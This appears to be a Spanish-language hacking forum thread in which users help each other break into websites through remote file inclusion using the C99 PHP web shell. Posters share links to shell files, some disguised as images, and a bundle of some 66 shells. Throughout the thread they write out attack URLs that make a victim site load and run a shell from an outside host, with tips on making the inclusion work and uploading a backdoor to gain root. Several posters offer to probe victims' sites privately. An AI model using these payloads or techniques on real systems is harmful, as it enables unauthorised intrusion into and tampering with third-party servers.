necesito una shell para rfi, me podéis decir si hay alguna web que tenga una o si en hosting gratuitos te deja subirla? Es que no creo q en un hosting gratuito te dejen usar system() o execute()
Gracias ;)
C99
http://usuarios.lycos.es/elitehacknet/C99Shell.txt
salu2
pd,
a la hora de ejecutarlo tienes que pones un "?" al final de txt
para que se ejecute y no salga como texto plano....
ej:
www.webvictima.com/index.php?page=http://usuarios.lycos.es/elitehacknet/C99Shell.txt?
_
me sale como texto plano con el ? =S
aquí la tienes en formato gif que te la he subido a un host:
http://www.freewebtown.com/sagitari/c99.gif
Si no te funciona prueba de poner el " ? " al final de gif..
salu22
No se puede mostrar la imagen "http://www.freewebtown.com/sagitari/c99.gif" porque contiene errores.
Con y sin ? sale eso =S
Con algunas sirve y con otras no, xq?
Gracias por subirme las shells tio te debo una ;)
funcionan bien las shell? no me deja ver code ni subir cosas
a ver.. estás seguro de que puedes hacer RFI en la web que estás probando?..
mándame el link "de la web víctima" por mensaje privado.. porque por aquí no puedes dar datos de terceros..
porque a lo mejor la web te estás equivocando, no es vulnerable a rfi y no deja incluir archivos externos....
o la web está en lenguaje asp? porque entonces lógico que no pueda leer shells en php ..
salu2 ...
pd, soy tía
y de nada!
buenas amigos tengo el mismo problema intente C99Shell.txt , c99.gif pero nada me sigue abriendo la pagina normal...
segun un scaning que le realize la web es vulnenable ha
Linkliste Index.PHP Multiple Remote File Include Vulnerabilities
http://www.securityfocus.com/bid/26045/exploit
http://webvulnerable/index.php?page=http://usuarios.lycos.es/elitehacknet/c99.gif
http://webvulnerable/index.php?page=http://usuarios.lycos.es/elitehacknet/c99.txt?
mándame la web por mp y te miro a ver pero no siempre son vulnerables aun que parezca que si, yo tengo como 10 guardadas que no puedo hacerles nada.
Que valla guay
Cita de: Zero- en 27 Enero 2008, 10:31 AM
mándame la web por mp y te miro a ver pero no siempre son vulnerables aun que parezca que si, yo tengo como 10 guardadas que no puedo hacerles nada.
Que vaya guay
es lo que te dije por privado..
hay muchas que al introducir la shell no te deja subir archivos
ni modificar
porque no tienes permisos de escritura 777
porque no eres root
y solamente tienes permisos de lectura..
entonces para poder tener permisos de root
tienes que subir un backdoor
pero eso no significa que no sea vulnerable
solamente resulta un poco más complejo
modificar la web..
Citarbuenas amigos tengo el mismo problema intente C99Shell.txt , c99.gif pero nada me sigue abriendo la pagina normal...
pues no será vulnerable..
prueba:
www.webvictima.com/index.php?page=http://google.essi no se te abre la web de google no es vulnerable...
y hay veces que el archivo que introduces sí se abre
pero de forma ajena al servidor.. por lo tanto no afectaría....
ni sería vulnerable.......
salu2
Citary hay veces que el archivo que introduces sí se abre
pero de forma ajena al servidor.. por lo tanto no afectaría....
ni sería vulnerable.......
Claro ejemplo de frame/iframe y
fopen en caso de PHP...
aca te dejo un rar con 66/67 shell no me acuerdo..estan la r57 la c99 entre otras..muy buena colección http://rapidshare.com/files/87180324/todas_las_shell.rar.html (http://rapidshare.com/files/87180324/todas_las_shell.rar.html)